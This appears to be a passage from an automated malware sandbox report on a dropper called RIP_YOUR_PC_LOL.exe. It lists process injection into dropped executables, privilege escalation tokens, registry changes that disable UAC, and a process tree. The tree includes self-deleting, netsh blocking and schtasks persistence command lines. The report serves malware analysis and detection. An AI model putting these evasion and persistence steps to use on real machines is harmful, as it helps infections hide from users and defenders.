N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Cursors\WUDFhosts.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4068 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 4068 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 4068 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 4068 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 4068 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 4068 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 4068 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4068 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4068 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4068 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 4068 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 4068 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1820 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Roaming\22.exe C:\Windows\SysWOW64\netsh.exe
PID 1820 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Roaming\22.exe C:\Windows\SysWOW64\netsh.exe
PID 1820 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Roaming\22.exe C:\Windows\SysWOW64\netsh.exe
PID 4068 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 4068 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 4068 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1168 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1168 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 1168 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3636 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 3636 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 3636 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 3636 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 3636 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 3636 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 3636 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 3636 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 3636 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 3636 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 3636 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 3636 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 3636 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 3636 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 3636 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 3636 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3636 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3636 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3636 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\a.exe
PID 3636 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\a.exe
PID 3636 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\a.exe
PID 2336 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2336 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2336 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1168 wrote to memory of 692 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchos.exe
PID 1168 wrote to memory of 692 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchos.exe
PID 1168 wrote to memory of 692 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchos.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

C:\Users\Admin\AppData\Roaming\healastounding.exe

"C:\Users\Admin\AppData\Roaming\healastounding.exe"

C:\Users\Admin\AppData\Roaming\Pluto Panel.exe

"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Users\Admin\AppData\Roaming\22.exe

"C:\Users\Admin\AppData\Roaming\22.exe"

C:\Users\Admin\AppData\Roaming\___11.19.exe

"C:\Users\Admin\AppData\Roaming\___11.19.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add policy name=Block

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\\svchost.exe

C:\Users\Admin\AppData\Roaming\test.exe

"C:\Users\Admin\AppData\Roaming\test.exe"

C:\Users\Admin\AppData\Roaming\gay.exe

"C:\Users\Admin\AppData\Roaming\gay.exe"

C:\Users\Admin\AppData\Roaming\Opus.exe

"C:\Users\Admin\AppData\Roaming\Opus.exe"

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Users\Admin\AppData\Roaming\4.exe

"C:\Users\Admin\AppData\Roaming\4.exe"

C:\Users\Admin\AppData\Roaming\a.exe

"C:\Users\Admin\AppData\Roaming\a.exe"

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul

C:\Users\Admin\AppData\Local\Temp\svchos.exe

C:\Users\Admin\AppData\Local\Temp\\svchos.exe

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -acsi

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp"

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

